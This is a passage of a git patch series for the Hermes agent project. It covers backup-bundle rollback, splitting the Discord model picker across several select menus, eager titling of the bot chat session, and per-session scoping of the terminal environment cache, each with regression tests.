staged_sidecars: + shutil.copy2(sidecar, side_staging) + # Publish sidecars first, main DB LAST (the commit marker), so a + # mid-publish failure never leaves a countable-but-incomplete bundle. + publish_order = [ + (s, d) for _src, s, d in staged_sidecars + ] + [main_pair] + for src, dst in publish_order: os.replace(src, dst) + published.append(dst) except Exception: - for src, _ in staged: + # Roll back BOTH unpublished staging files AND anything already + # promoted — the old code unlinked only staging srcs, so a failure + # after the main os.replace left the official backup_path on disk. + for src in all_staging_srcs: try: src.unlink(missing_ok=True) except OSError: pass + for dst in published: + try: + dst.unlink(missing_ok=True) + except OSError: + pass try: staging.unlink(missing_ok=True) except OSError: diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py index 872c5d9789..e6fa8724c0 100644 --- a/tests/test_state_db_repair_loop_mtime.py +++ b/tests/test_state_db_repair_loop_mtime.py @@ -33,6 +33,7 @@ from hermes_state import ( _MAX_MALFORMED_BACKUPS, _MAX_PERSISTENT_REPAIR_ATTEMPTS, _REPAIR_BACKUP_MIN_FREE_BYTES, + _backup_content_identity, _backup_db_file, _db_fingerprint, _existing_malformed_backups, @@ -677,3 +678,107 @@ def test_prune_removes_journal_sidecars_too(tmp_path): # And every surviving backup keeps its journal. for survivor in kept: assert survivor.with_name(survivor.name + "-journal").exists() + + +# --------------------------------------------------------------------------- +# Backup identity vs repair-epoch fingerprint are different equivalence +# relations (the forensic dedupe must NOT reuse _db_fingerprint). +# --------------------------------------------------------------------------- + + +def test_backup_not_deduped_after_interior_page_write(tmp_path): + """An interior-page write must force a fresh forensic backup. + + ``_db_fingerprint`` deliberately samples only head/tail and masks commit + counters so an ordinary write does not re-key the repair budget. If the + forensic dedupe reused THAT identity, a live writer committing new rows + into an interior page (size preserved, first/last 64KiB untouched) would + be handed the STALE earlier backup as "identical" — a recovery point that + predates real user data. The dedupe must use ``_backup_content_identity`` + (whole file), which detects the interior change. + """ + # Larger than 2x the 64KiB head/tail sample so a middle region exists + # outside the sampled windows. + db = tmp_path / "state.db" + db.write_bytes(b"SQLite format 3\x00" + os.urandom(300_000)) + size = db.stat().st_size + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + + with patch("shutil.disk_usage", return_value=roomy): + first, err = _backup_db_file(db) + assert err is None and first is not None + + # Mutate an interior byte far from both sampled windows; keep size + mtime. + raw = bytearray(db.read_bytes()) + mid = len(raw) // 2 + raw[mid] ^= 0xFF + st = db.stat() + db.write_bytes(bytes(raw)) + os.utime(db, ns=(st.st_atime_ns, st.st_mtime_ns)) + assert db.stat().st_size == size + + # Guard the test's own premise: the repair-epoch fingerprint is BLIND to + # this change (that is why it must not be the dedupe key), while the + # backup-content identity SEES it. + assert _backup_content_identity(db) != _backup_content_identity(first) + + with patch("shutil.disk_usage", return_value=roomy): + second, err = _backup_db_file(db) + assert err is None and second is not None + assert second != first, "an interior-page write was wrongly deduped to a stale backup" + assert len(_existing_malformed_backups(db)) == 2 + + +def test_publication_failure_leaves_no_countable_partial_bundle(tmp_path): + """A mid-publish os.replace failure must not leave a countable main backup. + + The bundle is published sidecars-first, main-DB-last (the main name is the + commit marker ``_existing_malformed_backups`` counts). If a promotion after + the first fails, cleanup must roll back every already-published + destination — otherwise an incomplete bundle (main present, a sidecar + missing) survives, passes the #69603 hard stop, and is deduped/reused as a + legitimate forensic copy on the next pass. + + Distinct from ``test_failed_copy_leaves_no_countable_debris``, which fails + during ``copy2`` (before any ``os.replace``); this exercises the + publication window. + """ + db = _damaged_db(tmp_path, size=200_000) + db.with_name(db.name + "-wal").write_bytes(os.urandom(50_000)) + roomy = type( + "Usage", (), {"total": 500_000_000_000, "used": 0, "free": 400_000_000_000} + )() + + real_replace = os.replace + calls = {"n": 0} + + def replace_fails_after_first(src, dst, *a, **kw): + # Let the first promotion (a sidecar) land, fail the next one. + calls["n"] += 1 + if calls["n"] == 2: + raise OSError(28, "No space left on device") + return real_replace(src, dst, *a, **kw) + + with patch("shutil.disk_usage", return_value=roomy), \ + patch("os.replace", replace_fails_after_first): + try: + _backup_db_file(db) + except OSError: + pass # the failure is re-raised by design; we assert on-disk state + + # No countable main backup, and no orphaned promoted sidecar, may survive. + assert not _existing_malformed_backups(db), "a partial bundle was left countable" + promoted = [ + p for p in tmp_path.iterdir() + if ".malformed-backup-" in p.name and p.name != "state.db" + ] + assert not promoted, f"partial promoted files survived: {promoted}" + + # A later clean pass must still succeed and must not dedupe onto debris. + with patch("shutil.disk_usage", return_value=roomy): + path, reason = _backup_db_file(db) + assert reason is None and path is not None + strays = list(tmp_path.glob("*.backup-staging-*")) + assert not strays, f"staging debris survived: {strays}" From cd80a7f36c87a2f8d5ca9e3931e78fbecd82fd43 Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 14:31:21 +0530 Subject: [PATCH 133/161] chore: map contributor email epicstorage0@gmail.com --- contributors/emails/epicstorage0@gmail.com | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 contributors/emails/epicstorage0@gmail.com diff --git a/contributors/emails/epicstorage0@gmail.com b/contributors/emails/epicstorage0@gmail.com new file mode 100644 index 0000000000..9def925ec9 --- /dev/null +++ b/contributors/emails/epicstorage0@gmail.com @@ -0,0 +1,2 @@ +EpicIsTheOne +# PR #71103 salvage (discord: model picker >25-option partitioning) From ab3e2f563b7b7cf36723b3fdffedf41e05b76779 Mon Sep 17 00:00:00 2001 From: Epic Date: Sat, 25 Jul 2026 00:49:11 +0000 Subject: [PATCH 134/161] fix(discord): render provider model lists >25 options across multiple select menus MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The Discord /model picker built a single discord.ui.Select filled with models[:25], silently dropping any models beyond the first 25. Discord caps a single select at 25 options but allows up to 5 component rows, so partition the list across up to 3 select menus (25 each; Back/Cancel use the other 2) instead of truncating. This fixes providers like Nous (curated list + Portal recommendations exceed 25) whose tail — including free-tier :free Portal picks — was previously clipped on Discord while showing fine in the Portal UI / CLI. - _build_model_select: slice into <=25-option chunks, one select per chunk (custom_id model_model_select_), all via _on_model_selected. Multi-row menus get a (n/total) placeholder suffix. - _on_provider_selected: 'N more available' count reflects models actually rendered across the partitioned menus. - Add regression test covering the 37-model Nous case (no truncation/dupes, per-menu 25 cap holds). --- plugins/platforms/discord/adapter.py | 80 ++++++--- .../test_discord_model_picker_partition.py | 157 ++++++++++++++++++ 2 files changed, 212 insertions(+), 25 deletions(-) create mode 100644 tests/gateway/test_discord_model_picker_partition.py diff --git a/plugins/platforms/discord/adapter.py b/plugins/platforms/discord/adapter.py index ad1a6ab119..71d6f0c06d 100644 --- a/plugins/platforms/discord/adapter.py +++ b/plugins/platforms/discord/adapter.py @@ -9224,7 +9224,16 @@ def _define_discord_view_classes() -> None: self.add_item(cancel_btn) def _build_model_select(self, provider_slug: str): - """Build the model dropdown for a specific provider.""" + """Build the model dropdown(s) for a specific provider. + + Discord caps each ``discord.ui.Select`` at 25 options and a View at + 5 action rows. We keep 2 rows for Back/Cancel, so partition the + model list across up to 3 select menus (75 slots) instead of + truncating at 25. This matters for providers like Nous whose + curated + Portal free-recommendation list exceeds 25 entries — the + tail (typically the ``:free`` Portal picks) was previously dropped + on Discord, so free-tier models never surfaced there. + """ self.clear_items() provider = next( (p for p in self.providers if p["slug"] == provider_slug), None @@ -9233,31 +9242,45 @@ def _define_discord_view_classes() -> None: return models = provider.get("models", []) - options = [] - for model_id in models[:25]: - short = model_id.split("/")[-1] if "/" in model_id else model_id - options.append( - discord.SelectOption( - label=_truncate_discord_component_text( - short, - _DISCORD_SELECT_FIELD_LIMIT, - ), - value=_truncate_discord_component_text( - model_id, - _DISCORD_SELECT_FIELD_LIMIT, - ), - ) - ) - if not options: + if not models: return - select = discord.ui.Select( - placeholder=f"Choose a model from {provider.get('name', provider_slug)}...", - options=options, - custom_id="model_model_select", - ) - select.callback = self._on_model_selected - self.add_item(select) + # Slice the model list into chunks of <= 25 across (up to) 3 select + # rows. Stash the full partitioned list so the count message in + # _on_provider_selected can report how many are actually shown. + chunks = [ + models[i : i + 25] for i in range(0, len(models), 25) + ][:3] + self._model_chunks = chunks + + total_rows = len(chunks) + 2 # + Back/Cancel buttons + placeholder_base = f"Choose a model from {provider.get('name', provider_slug)}" + for idx, chunk in enumerate(chunks): + options = [] + for model_id in chunk: + short = model_id.split("/")[-1] if "/" in model_id else model_id + options.append( + discord.SelectOption( + label=_truncate_discord_component_text( + short, + _DISCORD_SELECT_FIELD_LIMIT, + ), + value=_truncate_discord_component_text( + model_id, + _DISCORD_SELECT_FIELD_LIMIT, + ), + ) + ) + suffix = f" ({idx + 1}/{len(chunks)})" if len(chunks) > 1 else "" + select = discord.ui.Select( + placeholder=f"{placeholder_base}{suffix}...", + options=options, + custom_id=f"model_model_select_{idx}", + ) + # All model selects resolve through the same handler — the + # selected value is the model id, identical across rows. + select.callback = self._on_model_selected + self.add_item(select) back_btn = discord.ui.Button( label="◀ Back", style=discord.ButtonStyle.grey, custom_id="model_back" @@ -9322,8 +9345,15 @@ def _define_discord_view_classes() -> None: self._build_model_select(provider_slug) + # `shown` counts models actually rendered across the partitioned + # select menus (up to 3×25 = 75); older code hard-capped at 25 and + # silently dropped the tail (e.g. Nous `:free` Portal picks). total = provider.get("total_models", 0) if provider else 0 - shown = min(len(provider.get("models", [])), 25) if provider else 0 + chunks = getattr(self, "_model_chunks", None) + if chunks is not None: + shown = sum(len(c) for c in chunks) + else: + shown = min(len(provider.get("models", [])), 25) if provider else 0 extra = f"\n*{total - shown} more available — type `/model ` directly*" if total > shown else "" await interaction.response.edit_message( diff --git a/tests/gateway/test_discord_model_picker_partition.py b/tests/gateway/test_discord_model_picker_partition.py new file mode 100644 index 0000000000..53b0a52738 --- /dev/null +++ b/tests/gateway/test_discord_model_picker_partition.py @@ -0,0 +1,157 @@ +"""Regression test: Discord /model picker must surface ALL models for a +provider whose list exceeds 25 entries (e.g. Nous curated + Portal free +recommendations), not silently truncate the tail at 25 options. + +Discord caps a single Select at 25 options and a View at 5 action rows. The +picker keeps 2 rows for Back/Cancel, so it must partition the model list +across up to 3 select menus. This is what makes free-tier ``:free`` Portal +picks (appended after the curated list) appear on Discord — they previously +fell off the 25-option cliff. +""" + +from types import SimpleNamespace + +from gateway.platforms.base import utf16_len +from plugins.platforms.discord.adapter import ModelPickerView + + +def _all_options(view: "ModelPickerView"): + """Flatten every model select menu's options into (label, value). + + Detect selects by their ``model_model_select*`` custom_id (and presence of + ``.options``) rather than class name — the discord mock in conftest uses a + ``_FakeSelect`` class, while the real library uses ``discord.ui.Select``. + """ + out = [] + for child in view.children: + custom_id = getattr(child, "custom_id", "") + if isinstance(custom_id, str) and custom_id.startswith("model_model_select"): + out.extend((opt.label, opt.value) for opt in getattr(child, "options", [])) + return out + + +def test_nous_free_models_render_across_partitioned_selects(): + # 37 models: 32 curated + 5 free Portal recommendations appended at the tail + # (the real-world shape that was getting clipped at 25 on Discord). + models = [ + "anthropic/claude-fable-5", + "anthropic/claude-opus-4.8", + "anthropic/claude-sonnet-5", + "anthropic/claude-haiku-4.5", + "openai/gpt-5.6-sol", + "openai/gpt-5.6-sol-pro", + "openai/gpt-5.6-terra", + "openai/gpt-5.6-terra-pro", + "openai/gpt-5.6-luna", + "openai/gpt-5.6-luna-pro", + "openai/gpt-5.5", + "openai/gpt-5.5-pro", + "openai/gpt-5.4-mini", + "google/gemini-3-pro-preview", + "google/gemini-3.1-pro-preview", + "google/gemini-3.5-flash", + "x-ai/grok-4.5", + "deepseek/deepseek-v4-pro", + "deepseek/deepseek-v4-flash", + "qwen/qwen3.7-max", + "qwen/qwen3.7-plus", + "qwen/qwen3.6-35b-a3b", + "moonshotai/kimi-k2.6", + "moonshotai/kimi-k2.7-code", + "minimax/minimax-m3", + "z-ai/glm-5.2", + "z-ai/glm-5.1", + "xiaomi/mimo-v2.5-pro", + "tencent/hy3", + "stepfun/step-3.7-flash", + "nvidia/nemotron-3-super-120b-a12b", + "sakana/fugu-ultra", + # --- Portal free recommendations (the tail that was dropped) --- + "tencent/hy3:free", + "poolside/laguna-s-2.1:free", + "inclusionai/ling-3.0-flash:free", + "stepfun/step-3.7-flash:free", + "poolside/laguna-xs-2.1:free", + ] + assert len(models) == 37 + + view = ModelPickerView( + providers=[ + { + "slug": "nous", + "name": "Nous Portal", + "models": list(models), + "total_models": len(models), + "is_current": True, + } + ], + current_model="tencent/hy3", + current_provider="nous", + session_key="session-1", + on_model_selected=lambda *a, **k: None, + allowed_user_ids={"123"}, + ) + view._selected_provider = "nous" + view._build_model_select("nous") + + # The tail must render — this is the regression that was failing before + # multi-select partitioning. + rendered = [v for _label, v in _all_options(view)] + assert "tencent/hy3:free" in rendered + assert "stepfun/step-3.7-flash:free" in rendered + assert "poolside/laguna-s-2.1:free" in rendered + assert "inclusionai/ling-3.0-flash:free" in rendered + assert "poolside/laguna-xs-2.1:free" in rendered + + # Every model must appear exactly once (no truncation, no dupes). + assert sorted(rendered) == sorted(models) + assert len(rendered) == 37 + + # 37 models => 2 select rows of 25 + 12, plus Back/Cancel = 4 action rows. + select_rows = [ + c for c in view.children + if isinstance(getattr(c, "custom_id", ""), str) + and c.custom_id.startswith("model_model_select") + ] + assert len(select_rows) == 2 + assert len(select_rows[0].options) == 25 + assert len(select_rows[1].options) == 12 + + # Each option still respects Discord's 100-char utf16 field limit. + for _label, value in _all_options(view): + assert utf16_len(value) <= 100 + + # No single select exceeds Discord's 25-option hard cap. + for sel in select_rows: + assert len(sel.options) <= 25 + + +def test_small_provider_single_select_unchanged(): + """A <25-model provider still renders as a single select menu.""" + models = [f"m/{i}" for i in range(10)] + view = ModelPickerView( + providers=[ + { + "slug": "emoji", + "name": "Emoji", + "models": models, + "total_models": len(models), + "is_current": False, + } + ], + current_model="m/0", + current_provider="emoji", + session_key="session-1", + on_model_selected=lambda *a, **k: None, + allowed_user_ids={"123"}, + ) + view._selected_provider = "emoji" + view._build_model_select("emoji") + + select_rows = [ + c for c in view.children + if isinstance(getattr(c, "custom_id", ""), str) + and c.custom_id.startswith("model_model_select") + ] + assert len(select_rows) == 1 + assert len(select_rows[0].options) == 10 From 209e2ebdda9109e84f35833174caf83e55bd79be Mon Sep 17 00:00:00 2001 From: kshitijk4poor Date: Sat, 22 Aug 2026 14:43:15 +0530 Subject: [PATCH 135/161] refactor(discord): derive model-select counts, name the 25-option cap MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Review follow-ups for the salvaged picker partitioning: - Drop the _model_chunks stash — it went stale when navigating to a provider with an empty model list (early return skipped the reassignment), producing a wrong 'N more available' count. Derive shown = min(len(models), 75) directly instead. - Add _DISCORD_SELECT_MAX_OPTIONS / _DISCORD_SELECT_MAX_ROWS constants per the file's named-limits convention; replaces 4 bare literals. - Remove dead total_rows variable. --- plugins/platforms/discord/adapter.py | 32 +++++++++++++++------------- 1 file changed, 17 insertions(+), 15 deletions(-) diff --git a/plugins/platforms/discord/adapter.py b/plugins/platforms/discord/adapter.py index 71d6f0c06d..818827e889 100644 --- a/plugins/platforms/discord/adapter.py +++ b/plugins/platforms/discord/adapter.py @@ -84,6 +84,9 @@ _DISCORD_COMMAND_SYNC_MAX_RATE_LIMIT_SLEEP_SECONDS = 30.0 # at or below this limit at registration time. _DISCORD_MAX_APP_COMMANDS = 100 _DISCORD_SELECT_FIELD_LIMIT = 100 +# Discord caps a single select menu at 25 options; a View holds at most 5 rows. +_DISCORD_SELECT_MAX_OPTIONS = 25 +_DISCORD_SELECT_MAX_ROWS = 5 _DISCORD_BUTTON_LABEL_LIMIT = 80 _DISCORD_ELLIPSIS = "\u2026" _DISCORD_NONCONVERSATIONAL_METADATA_KEYS = frozenset({ @@ -9211,7 +9214,7 @@ def _define_discord_view_classes() -> None: select = discord.ui.Select( placeholder="Choose a provider...", - options=options[:25], + options=options[:_DISCORD_SELECT_MAX_OPTIONS], custom_id="model_provider_select", ) select.callback = self._on_provider_selected @@ -9245,15 +9248,18 @@ def _define_discord_view_classes() -> None: if not models: return - # Slice the model list into chunks of <= 25 across (up to) 3 select - # rows. Stash the full partitioned list so the count message in - # _on_provider_selected can report how many are actually shown. + # Slice the model list into <= 25-option chunks across (up to) 3 + # select rows: 3 selects + Back/Cancel = 5 rows, Discord's View cap. + # Providers past that would still clip, but none currently do. chunks = [ - models[i : i + 25] for i in range(0, len(models), 25) - ][:3] - self._model_chunks = chunks + models[ + i : i + _DISCORD_SELECT_MAX_OPTIONS + ] + for i in range(0, len(models), _DISCORD_SELECT_MAX_OPTIONS) + ][ + : _DISCORD_SELECT_MAX_ROWS - 2 + ] # keep 2 rows for Back/Cancel - total_rows = len(chunks) + 2 # + Back/Cancel buttons placeholder_base = f"Choose a model from {provider.get('name', provider_slug)}" for idx, chunk in enumerate(chunks): options = [] @@ -9346,14 +9352,10 @@ def _define_discord_view_classes() -> None: self._build_model_select(provider_slug) # `shown` counts models actually rendered across the partitioned - # select menus (up to 3×25 = 75); older code hard-capped at 25 and - # silently dropped the tail (e.g. Nous `:free` Portal picks). + # select menus (up to 3×25 = 75); the old code hard-capped at 25 + # and silently dropped the tail (e.g. Nous `:free` Portal picks). total = provider.get("total_models", 0) if provider else 0 - chunks = getattr(self, "_model_chunks", None) - if chunks is not None: - shown = sum(len(c) for c in chunks) - else: - shown = min(len(provider.get("models", [])), 25) if provider else 0 + shown = min(len(provider.get("models", [])), 75) if provider else 0 extra = f"\n*{total - shown} more available — type `/model ` directly*" if total > shown else "" await interaction.response.edit_message( From e95dd466b120d013f53e48f11785fb01466e6587 Mon Sep 17 00:00:00 2001 From: Mauvis Ledford Date: Fri, 21 Aug 2026 01:03:10 +0800 Subject: [PATCH 136/161] fix(bot-mode): persist canonical chat before opening --- .../desktop/src/plugins/hermes-bots/plugin.js | 18 +++++++++++++ .../tests/canonical-chat-creation.test.mjs | 27 ++++++++++++++++++- contributors/emails/switchstatement@gmail.com | 1 + 3 files changed, 45 insertions(+), 1 deletion(-) create mode 100644 contributors/emails/switchstatement@gmail.com diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index 2aacbe5be9..eed110e190 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -4149,6 +4149,24 @@ function createCanonicalChat(name) { const sid = res?.stored_session_id const runtime = res?.session_id + // session.create is intentionally lazy: its stored row does not exist until + // the first prompt. Mounting `sid` immediately therefore emits a noisy REST + // 404 ("Session not found"), and the turn-start auto-titler can win the race + // against the deferred `title: 'Bot Chat'` — under name-identity that is an + // identity outage: until the row is titled, the registry has no "Bot Chat" + // entry, so a second click during the intro turn mints a duplicate. + // session.title materializes the row now and records a user-authority title + // before either the open or kickoff, closing both the 404 race and the + // untitled window. Older gateways may not support the eager write; retain + // the kickoff-and-retry fallback below. + if (runtime) { + try { + await host.request('session.title', { session_id: runtime, title: CANONICAL_CHAT_TITLE }) + } catch { + /* compatibility fallback: prompt.submit will persist the lazy row */ + } + } + // Mount the session view FIRST, then send the kickoff — submitting into // an unmounted session left the intro reply invisible until reopen. let opened = false diff --git a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs index e5b069bdd5..4174413ce9 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/canonical-chat-creation.test.mjs @@ -22,7 +22,31 @@ function loadCanonicalCreation({ openSession, request }) { return { ...context.__canonical } } -test('regression: navigation retries after the kickoff persists a new canonical chat', async () => { +test('regression: creation materializes and titles the lazy row before opening it', async () => { + const events = [] + const runtime = loadCanonicalCreation({ + openSession: async id => events.push(`open:${id}`), + request: async (method, params) => { + events.push(method) + if (method === 'session.create') return { stored_session_id: 'stored-1', session_id: 'runtime-1' } + if (method === 'session.title') { + assert.deepEqual(params, { session_id: 'runtime-1', title: 'Bot Chat' }) + } + return {} + } + }) + + assert.equal(await runtime.createCanonicalChat('ops'), 'stored-1') + assert.deepEqual(events, [ + 'session.list', + 'session.create', + 'session.title', + 'open:stored-1', + 'prompt.submit' + ]) +}) + +test('compatibility: navigation retries after kickoff when eager title persistence is unavailable', async () => { const events = [] let attempts = 0 const runtime = loadCanonicalCreation({ @@ -33,6 +57,7 @@ test('regression: navigation retries after the kickoff persists a new canonical }, request: async method => { if (method === 'session.create') return { stored_session_id: 'stored-1', session_id: 'runtime-1' } + if (method === 'session.title') throw new Error('unknown method') if (method === 'prompt.submit') events.push('kickoff:persisted') return {} } diff --git a/contributors/emails/switchstatement@gmail.com b/contributors/emails/switchstatement@gmail.com new file mode 100644 index 0000000000..a8dbc4603c --- /dev/null +++ b/contributors/emails/switchstatement@gmail.com @@ -0,0 +1 @@ +krunkosaurus From a270c4adeab6d4466ed93a628ce5c34d363bd6cd Mon Sep 17 00:00:00 2001 From: carryzuo00 Date: Sat, 23 May 2026 09:34:11 +0000 Subject: [PATCH 137/161] fix(terminal): scope environment cache by session key to prevent cross-profile SSH leakage MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit _resolve_container_task_id always returned "default", so _active_environments shared a single SSHEnvironment across all WebUI sessions. When a user switched from profile A (ssh_host=10.0.0.1) to profile B (ssh_host=10.0.0.2), the new session found _active_environments["default"] already set to A's SSHEnvironment and reused it — silently running every command on the wrong remote host. Fix: when HERMES_SESSION_KEY is present (set per-session by the WebUI streaming layer and per-message by the gateway via contextvars), return "session:" as the cache key instead of "default". Each session now owns its own slot in _active_environments and always creates an environment from its own profile's TERMINAL_SSH_HOST / TERMINAL_ENV config. Behaviour unchanged in CLI mode (no HERMES_SESSION_KEY → still "default"). RL/benchmark task overrides (register_task_env_overrides) are unaffected. Subagent task_ids inside a WebUI session collapse to "session:" so they continue to share the parent session's container. Five new regression tests added to test_shared_container_task_id.py. --- tests/tools/test_shared_container_task_id.py | 48 ++++++++++++++++++++ tools/terminal_tool.py | 20 ++++++++ 2 files changed, 68 insertions(+) diff --git a/tests/tools/test_shared_container_task_id.py b/tests/tools/test_shared_container_task_id.py index 614b868c42..0354cf0290 100644 --- a/tests/tools/test_shared_container_task_id.py +++ b/tests/tools/test_shared_container_task_id.py @@ -67,3 +67,51 @@ def test_env_type_override_keeps_own_id(): ) finally: terminal_tool.clear_task_env_overrides("bench-env") + + +# --- Cross-profile SSH-leak isolation (commit e00f940a9, re-applied) --------- +# +# When a session key is present (WebUI/gateway), each session must own its own +# slot in _active_environments so switching from profile A (ssh_host=10.0.0.1) +# to profile B (ssh_host=10.0.0.2) cannot reuse A's SSHEnvironment. Without this +# the shared "default" slot silently runs commands on the wrong remote host. + + +def test_session_key_scopes_to_its_own_slot(monkeypatch): + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-A") + assert terminal_tool._resolve_container_task_id(None) == "session:sess-A" + + +def test_distinct_session_keys_get_distinct_slots(monkeypatch): + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-A") + a = terminal_tool._resolve_container_task_id(None) + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-B") + b = terminal_tool._resolve_container_task_id(None) + assert a == "session:sess-A" + assert b == "session:sess-B" + assert a != b + + +def test_subagent_collapses_onto_parent_session(monkeypatch): + # Subagents inherit the parent's session key, so they share the parent's + # container (the #16177 intent) rather than a global "default". + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-A") + assert ( + terminal_tool._resolve_container_task_id("subagent-3-cafef00d") + == "session:sess-A" + ) + + +def test_rl_override_wins_over_session_key(monkeypatch): + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-A") + terminal_tool.register_task_env_overrides("tb2-z", {"docker_image": "z:1"}) + try: + assert terminal_tool._resolve_container_task_id("tb2-z") == "tb2-z" + finally: + terminal_tool.clear_task_env_overrides("tb2-z") + + +def test_no_session_key_still_defaults(monkeypatch): + # CLI mode: no session key -> unchanged "default" behaviour. + monkeypatch.delenv("HERMES_SESSION_KEY", raising=False) + assert terminal_tool._resolve_container_task_id(None) == "default" diff --git a/tools/terminal_tool.py b/tools/terminal_tool.py index 0d90fe5592..9f4c237541 100644 --- a/tools/terminal_tool.py +++ b/tools/terminal_tool.py @@ -1386,6 +1386,26 @@ def _resolve_container_task_id(task_id: Optional[str]) -> str: return task_id if task_id and _docker_session_isolation_enabled(): return _resolve_container_alias(task_id) + # Per-session isolation: when a session key is present (the WebUI streaming + # layer sets it per-session, the gateway per-message via contextvars), scope + # the container to it so switching profiles can't reuse a previous profile's + # SSHEnvironment and silently run commands on the wrong remote host. Subagents + # inherit the same session key, so they still collapse onto the parent's + # container (the #16177 shared-container intent). CLI mode has no session key + # and falls through to "default", behaviour unchanged. See commit e00f940a9. + # + # This runs *after* the isolation-override and docker/container_persistent + # branches above: those paths already key containers per task_id, so they + # stay authoritative where they apply and this only covers the cases that + # would otherwise collapse to the shared "default" key (notably SSH). + try: + from gateway.session_context import get_session_env + + session_key = get_session_env("HERMES_SESSION_KEY", "") + except Exception: + session_key = os.getenv("HERMES_SESSION_KEY", "") + if session_key: + return f"session:{session_key}" return "default" From 8a963e85123e5e2ac3fb7df399c4c35603d1e1c3 Mon Sep 17 00:00:00 2001 From: carryzuo00 Date: Wed, 15 Jul 2026 01:51:38 +0800 Subject: [PATCH 138/161] test(terminal): cover gateway ContextVar session-key path The existing session-key regressions set HERMES_SESSION_KEY via os.environ, which only exercises the os.getenv() fallback branch. Real gateway turns bind the identity through gateway.session_context.set_session_vars() (a ContextVar) and never write the process-global env var. Add two companion regressions that bind via set_session_vars() with HERMES_SESSION_KEY absent from os.environ: - test_session_key_from_contextvar_without_environ: container slot scopes to session: purely through the ContextVar (subagent inheritance covered). - test_contextvar_session_key_wins_over_environ: with a different value left in os.environ, the ContextVar-bound session wins, so two concurrent gateway sessions in one process cannot cross-contaminate via the process global. Cleanup via clear_session_vars(tokens) in finally. --- tests/tools/test_shared_container_task_id.py | 48 ++++++++++++++++++++ 1 file changed, 48 insertions(+) diff --git a/tests/tools/test_shared_container_task_id.py b/tests/tools/test_shared_container_task_id.py index 0354cf0290..b4ea3fa4b9 100644 --- a/tests/tools/test_shared_container_task_id.py +++ b/tests/tools/test_shared_container_task_id.py @@ -115,3 +115,51 @@ def test_no_session_key_still_defaults(monkeypatch): # CLI mode: no session key -> unchanged "default" behaviour. monkeypatch.delenv("HERMES_SESSION_KEY", raising=False) assert terminal_tool._resolve_container_task_id(None) == "default" + + +# --- Production gateway path: session key bound via ContextVars --------------- +# +# The tests above set HERMES_SESSION_KEY through os.environ, which only +# exercises the os.getenv() *fallback* branch of the scoping logic. Real +# gateway turns never write this process-global env var — they bind the +# identity through gateway.session_context.set_session_vars(), which stores it +# in a ContextVar, and _resolve_container_task_id reads it back via +# get_session_env(). These companion tests cover that production path with +# HERMES_SESSION_KEY absent from os.environ. + + +def test_session_key_from_contextvar_without_environ(monkeypatch): + # Prove the fix works on the gateway path: HERMES_SESSION_KEY is NOT in + # os.environ; the key lives only in the ContextVar bound by the gateway. + from gateway.session_context import clear_session_vars, set_session_vars + + monkeypatch.delenv("HERMES_SESSION_KEY", raising=False) + tokens = set_session_vars(session_key="sess-ctx") + try: + assert ( + terminal_tool._resolve_container_task_id(None) == "session:sess-ctx" + ) + # Subagents inherit the same ContextVar and collapse onto the parent. + assert ( + terminal_tool._resolve_container_task_id("subagent-1-cafe") + == "session:sess-ctx" + ) + finally: + clear_session_vars(tokens) + + +def test_contextvar_session_key_wins_over_environ(monkeypatch): + # Two concurrent gateway sessions in one process must not cross-contaminate: + # the ContextVar is authoritative even when a *different* value lingers in + # os.environ (e.g. a CLI-set or previously-leaked global). The container + # slot must follow the ContextVar-bound session, not the process global. + from gateway.session_context import clear_session_vars, set_session_vars + + monkeypatch.setenv("HERMES_SESSION_KEY", "sess-ENV") + tokens = set_session_vars(session_key="sess-CTX") + try: + assert ( + terminal_tool._resolve_container_task_id(None) == "session:sess-CTX" + ) + finally: + clear_session_vars(tokens) From 8e475ed27b1199b8d0bbf094cf2e15fcd555f8cf Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 14:55:41 +0530 Subject: [PATCH 139/161] refactor(terminal): extract _current_session_key() helper for session-key lookups MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up to the session-scoping fix: _get_sudo_password_cache_scope() and _resolve_container_task_id() carried byte-identical copies of the HERMES_SESSION_KEY lookup (contextvar + os.environ fallback). Collapse both onto one helper adopting the bare-import convention approval.py already uses — get_session_env() implements the fallback internally, so the old try/except could only fire on import failure, where silently degrading to process-global semantics would reintroduce exactly the cross-session contamination the fix prevents. --- tools/terminal_tool.py | 27 +++++++++++++++------------ 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/tools/terminal_tool.py b/tools/terminal_tool.py index 9f4c237541..b0ec8ff39e 100644 --- a/tools/terminal_tool.py +++ b/tools/terminal_tool.py @@ -272,6 +272,19 @@ def _get_sudo_password_callback(): return getattr(_callback_tls, "sudo_password", None) +def _current_session_key() -> str: + """Return the active gateway/WebUI session key, or "" outside sessions. + + Single lookup point for the ``HERMES_SESSION_KEY`` ContextVar with the + os.environ fallback that ``get_session_env()`` applies for CLI, cron, and + test processes. Callers scope per-session caches by prefixing the value + with ``"session:"`` so two sessions never share a cache slot. + """ + from gateway.session_context import get_session_env + + return get_session_env("HERMES_SESSION_KEY", "") + + def _get_approval_callback(): return 